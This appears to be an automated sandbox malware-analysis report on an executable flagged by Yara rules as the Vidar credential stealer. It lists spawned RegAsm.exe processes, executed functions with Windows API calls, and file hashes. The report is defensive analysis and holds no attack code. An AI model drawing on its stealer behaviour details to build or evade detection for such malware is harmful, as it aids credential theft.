2024-04-26 19:35:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 19:35:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	21:35:08
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x8d0000
File size:	409'600 bytes
MD5 hash:	5CAB81FAE61CB23017CC6C6EB6A7E433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	21:35:08
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:35:09
Start date:	26/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x1c0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:35:09
Start date:	26/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x550000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	21:35:09
Start date:	26/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xd20000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.8%
Total number of Nodes:	661
Total number of Limit Nodes:	39

Executed Functions

Function 008E650C Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 446a5a0659b51923153a386a8d1dd19e487dd6bfe9ee2c2d2188736cbce3d2b0
Instruction ID: f9b82b2ab3dbd9efb9045ff3d03519f7c2d35905f03f2224b11a124ac542748d
Opcode Fuzzy Hash: 446a5a0659b51923153a386a8d1dd19e487dd6bfe9ee2c2d2188736cbce3d2b0
Instruction Fuzzy Hash: 94F0A972A11270AFCB22CB4DC905B9873A8FB56BA1F110496E102EB280D2B0DE50CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 008E5EAF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,1DEEDD56,?,008E5FBC,?,?,?,00000000), ref: 008E5F70

Strings

ext-ms-, xrefs: 008E5F1A
api-ms-, xrefs: 008E5F06

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: e25a0972ff7c421efb9e5b700b4f4af291c2f9ff5f0e6101e31cdceeb25be10f
Instruction ID: c55bd198699342603bc225066805ba02c79958c75d13df778f95215f2919cbd5
Opcode Fuzzy Hash: e25a0972ff7c421efb9e5b700b4f4af291c2f9ff5f0e6101e31cdceeb25be10f
Instruction Fuzzy Hash: AC210A31A05A55ABD7219B76EC54A6A3758FF53768F240211FA15E72D0DF30EE00D6E0

Uniqueness

Uniqueness Score: -1.00%

Function 008F3416 Relevance: 8.1, APIs: 3, Strings: 1, Instructions: 1058
sleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008D1FDD: _strlen.LIBCMT ref: 008D1FF5

VirtualProtect.KERNELBASE(00935038,000004AC,00000040,?,006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@), ref: 008F3468
FreeConsole.KERNELBASE ref: 008F346E
Sleep.KERNELBASE(0000012C,008F339A), ref: 008F348E

Strings

006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@, xrefs: 008F3427

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ConsoleFreeProtectSleepVirtual_strlen
String ID: 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@
API String ID: 3830758701-32248209
Opcode ID: bbfaf6e4b45754a3c7eae3e9740332a063164f778bb085dd575682b44feb4260
Instruction ID: 279b4a68b9990a3e2067ef9ca0ef600286b5296f981cd4eae701868d9e109a17
Opcode Fuzzy Hash: bbfaf6e4b45754a3c7eae3e9740332a063164f778bb085dd575682b44feb4260
Instruction Fuzzy Hash: F2118C31A41608ABCB14EBB8DC46EBE77B0FF54300F404126E201E62C2EE649A49CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 008E72D2 Relevance: 7.7, APIs: 5, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 008E7359
__alloca_probe_16.LIBCMT ref: 008E741A
__freea.LIBCMT ref: 008E7481

Part of subcall function 008E4AE0: HeapAlloc.KERNEL32(00000000,?,?,?,00000003,008E36BA), ref: 008E4B12

__freea.LIBCMT ref: 008E7496
__freea.LIBCMT ref: 008E74A6

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 9992956f3518a8251476e6185f0f278b26e4bba7c9fcea496d3f1f5f5c40615d
Instruction ID: bf6964f1ad74d63e6a35e72ad4270874dce4701290c071bd4b8c25c04764a554
Opcode Fuzzy Hash: 9992956f3518a8251476e6185f0f278b26e4bba7c9fcea496d3f1f5f5c40615d
Instruction Fuzzy Hash: 1C51C57260425AAFEB219FA6CC41EBF7BA9FF46358B150129FD04D6290F770CC109765

Uniqueness

Uniqueness Score: -1.00%

Function 008DDE3B Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,?,Function_0000DCDF,00000000,?,00000000), ref: 008DDE84
GetLastError.KERNEL32(?,00000000,05D1745D,?,?,?,?,?,?,?,008D34EF,?,00000000,?,?,?), ref: 008DDE90
__dosmaperr.LIBCMT ref: 008DDE97

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: fb166a6127d356cd9ae7f824f3157be55f6f9cb6155f71f5b04a713fd3f571dc
Instruction ID: 8bdd2d9e8e42b4217dab1bb3fee1b7396fa326dc1c698f7d4dd8676b34b86a63
Opcode Fuzzy Hash: fb166a6127d356cd9ae7f824f3157be55f6f9cb6155f71f5b04a713fd3f571dc
Instruction Fuzzy Hash: C7019A72501319ABCF15AFA4DC06AAE7BA5FF11360F10025AF801DA390EB70DE50EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008D4590 Relevance: 4.5, APIs: 3, Instructions: 33
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,008D40CE,?,?,00000000,?,?,00000000,?,?,008D2FAB), ref: 008D459C
GetExitCodeThread.KERNEL32(?,?,?,?,?,008D40CE,?,?,00000000,?,?,00000000,?,?,008D2FAB,?), ref: 008D45B5
FindCloseChangeNotification.KERNELBASE(?,?,?,?,008D40CE,?,?,00000000,?,?,00000000,?,?,008D2FAB,?,00000001), ref: 008D45C7

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ChangeCloseCodeExitFindNotificationObjectSingleThreadWait
String ID:
API String ID: 3816883391-0
Opcode ID: 4d9f5203ac55efa9f56ec5b912d31c2d626e5ad4d5fbc1eff6bdfc6ad84b946e
Instruction ID: c2e1224b3a60ef52bbd5ef8e676bf4f1e1df625e6be5b8ee063873ad49dcde79
Opcode Fuzzy Hash: 4d9f5203ac55efa9f56ec5b912d31c2d626e5ad4d5fbc1eff6bdfc6ad84b946e
Instruction Fuzzy Hash: ECF05E32504518EBDB109F74EC05FAA3B64FF41770F241312B922E62E0DB31DE50EA80

Uniqueness

Uniqueness Score: -1.00%

Function 008DDD94 Relevance: 4.5, APIs: 3, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008E3751: GetLastError.KERNEL32(00000000,?,008DE852,008E48AB,?,?,008E364D,00000001,00000364,?,00000002,000000FF,?,008DDD04,008FD328,0000000C), ref: 008E3755
Part of subcall function 008E3751: SetLastError.KERNEL32(00000000), ref: 008E37F7

CloseHandle.KERNEL32(?,?,?,008DDECB,?,?,008DDD3D,00000000), ref: 008DDDC5
FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,008DDECB,?,?,008DDD3D,00000000), ref: 008DDDDB
ExitThread.KERNEL32 ref: 008DDDE4

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary
String ID:
API String ID: 1991824761-0
Opcode ID: ecdddb9e28cab43b90c73e751d8df3fc7b0dd671f9b335ff6960a82477697e23
Instruction ID: 6da84e1751dcbcc485f2d5783388ce340c6f2af7e31e98a1ce0731383e09c9c2
Opcode Fuzzy Hash: ecdddb9e28cab43b90c73e751d8df3fc7b0dd671f9b335ff6960a82477697e23
Instruction Fuzzy Hash: 49F05E30200700ABCF212B798C08A6B3B9AFF41364F194716B865C32A1DB30EC55C661

Uniqueness

Uniqueness Score: -1.00%

Function 008E136F Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000002,?,008E1369,008DDFC6,008DDFC6,?,00000002,1DEEDD56,008DDFC6,00000002), ref: 008E1380
TerminateProcess.KERNEL32(00000000,?,008E1369,008DDFC6,008DDFC6,?,00000002,1DEEDD56,008DDFC6,00000002), ref: 008E1387
ExitProcess.KERNEL32 ref: 008E1399

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5b869b526c32e52910f578d2482862f7b80f7d4772f43daa1e6c8ee9d156e811
Instruction ID: 6557d4162733485d67006b8488a489be980a40773b0f22119403f040ab211417
Opcode Fuzzy Hash: 5b869b526c32e52910f578d2482862f7b80f7d4772f43daa1e6c8ee9d156e811
Instruction Fuzzy Hash: 18D09E31000644BBCF412FB6EC0DD6A3F26FF81345B145011BA0989171DF369952DB55

Uniqueness

Uniqueness Score: -1.00%

Function 008E8A3D Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008E8187: GetConsoleOutputCP.KERNEL32(1DEEDD56,00000000,00000000,00000000), ref: 008E81EA

WriteFile.KERNEL32(?,00000000,?,008FD798,00000000,0000000C,00000000,00000000,?,00000000,008FD798,00000010,008DFC7A,00000000,00000000,00000000), ref: 008E8BA6
GetLastError.KERNEL32(?,00000000), ref: 008E8BB0

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: d7944af875a390d2400c87e2c575873e7975caf3f2373c1934fe27118d8fa606
Instruction ID: f13df44f879071d4d6e537c5212cf1d76ea620c2c8f89d51684b3398c459f4f6
Opcode Fuzzy Hash: d7944af875a390d2400c87e2c575873e7975caf3f2373c1934fe27118d8fa606
Instruction Fuzzy Hash: 7D6181B1D04199EEDF119FA9C884EEEBBB9FF4A318F144195E808E7252DB31C901DB61

Uniqueness

Uniqueness Score: -1.00%

Function 008EA6CB Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008EA1FB: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 008EA226

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,008EA512,?,00000000,?,00000000,?), ref: 008EA72C
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,008EA512,?,00000000,?,00000000,?), ref: 008EA76E

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 709071bc10f7f9e0c280667587ed3eb65c97a79468089f53139d8cdac48ee05b
Instruction ID: 50af1d7bcae3d636a96554d119b032aead596b02189884480f6bd55173d8a26e
Opcode Fuzzy Hash: 709071bc10f7f9e0c280667587ed3eb65c97a79468089f53139d8cdac48ee05b
Instruction Fuzzy Hash: DE513670A003959EDB28CF76C8806BABBF5FF82B04F14407ED092C7252D774A946CB52

Uniqueness

Uniqueness Score: -1.00%

Function 008D5A4E Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_Fputc.LIBCPMT ref: 008D5B27

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: Fputc
String ID:
API String ID: 3078413507-0
Opcode ID: 0547b2e6e615a6ea389a1a0103a7ca69241ca4d7b7c44a453a34df646e1e57df
Instruction ID: 45e2d050816f540c49af17ec2ee2144cae211a3cb1b8728ebd9a28ab6418433f
Opcode Fuzzy Hash: 0547b2e6e615a6ea389a1a0103a7ca69241ca4d7b7c44a453a34df646e1e57df
Instruction Fuzzy Hash: 3F415F35910A2AAFCB15DF68C4948ED77B8FF18314B584217E502E7750EB31ED55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 008E863F Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,008E8B8C,00000000,00000000,00000000,?,0000000C,00000000), ref: 008E86DB
GetLastError.KERNEL32(?,008E8B8C,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,008FD798,00000010,008DFC7A,00000000,00000000), ref: 008E8701

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: ea401968f051c0be2d011e14ec2bab8846c4c8967f8477d8a39e698169fbdc3c
Instruction ID: 583b7edf508d8a164d5a03582b7f0e7f2f41a2abe138eb47de3f3fc0c2770b3b
Opcode Fuzzy Hash: ea401968f051c0be2d011e14ec2bab8846c4c8967f8477d8a39e698169fbdc3c
Instruction Fuzzy Hash: 2A215135A00259DFCB15CF2ADC80AEDB7B5FB59305F2441AAEA0AD7211DA309D46CB64

Uniqueness

Uniqueness Score: -1.00%

Function 008E5B9D Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 008E5BE9
GetFileType.KERNELBASE(00000000), ref: 008E5BFB

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 8b2a6e1b07640496f2d2a3982c4c0604da3fb4941090fd5569ea2f6a9a325432
Instruction ID: a688178a5d85de2ab40b5f99befd23500f3bc89294b4a4b36c7eb01b8f0c4861
Opcode Fuzzy Hash: 8b2a6e1b07640496f2d2a3982c4c0604da3fb4941090fd5569ea2f6a9a325432
Instruction Fuzzy Hash: C0117271204FC94AC7305A3F8CA8622BA95F79733CB380B5AD1B7C65F1C724D986A641

Uniqueness

Uniqueness Score: -1.00%

Function 008DDCDF Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(008FD328,0000000C), ref: 008DDCF2
ExitThread.KERNEL32 ref: 008DDCF9

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: bbf734df69403c02f8718e14c3270f7d6fe99b1b4a404972fb80e5ba8afd221b
Instruction ID: 24c6d3d98c5c7bfe49045ce9ee141586ea7218898257e7cf3c5cc66046025d40
Opcode Fuzzy Hash: bbf734df69403c02f8718e14c3270f7d6fe99b1b4a404972fb80e5ba8afd221b
Instruction Fuzzy Hash: 2BF0AF71900344AFDB10AFB4C80AA6E3B75FF52700F10014AF511DB3A2DB749951CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 008E6389 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,008E73C0,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 008E63BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,008E73C0,?,?,00000000,?,00000000), ref: 008E63DB

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 027178745c6ab33314638402d1015adab474f945bbec31f2166dfcf4f2cd9889
